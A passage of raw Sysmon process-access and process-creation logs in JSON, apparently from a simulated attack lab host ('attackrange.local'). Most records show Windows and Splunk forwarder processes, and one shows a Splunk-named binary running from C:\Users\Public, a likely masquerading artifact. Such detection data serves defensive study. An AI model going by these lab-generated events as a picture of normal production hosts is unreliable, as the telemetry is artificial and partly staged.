C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2352,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2353,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2354,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2355,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:26.989\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1076-5F25-0000-00108C240400}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:26.989","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1076-5F25-0000-00108C240400}","TargetProcessId":"2180","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2356,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.130\r\nSourceProcessGUID: {E2A3D6B1-1076-5F25-0000-00108C240400}\r\nSourceProcessId: 2180\r\nSourceThreadId: 4088\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.130","SourceProcessGUID":"{E2A3D6B1-1076-5F25-0000-00108C240400}","SourceProcessId":"2180","SourceThreadId":"4088","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2357,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.802\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.802","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2358,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.666\r\nProcessGuid: {E2A3D6B1-1077-5F25-0000-001065260400}\r\nProcessId: 4004\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.666","ProcessGuid":"{E2A3D6B1-1077-5F25-0000-001065260400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2359,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1077-5F25-0000-001065260400}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1077-5F25-0000-001065260400}","TargetProcessId":"4004","TargetImage":"C:\\Program 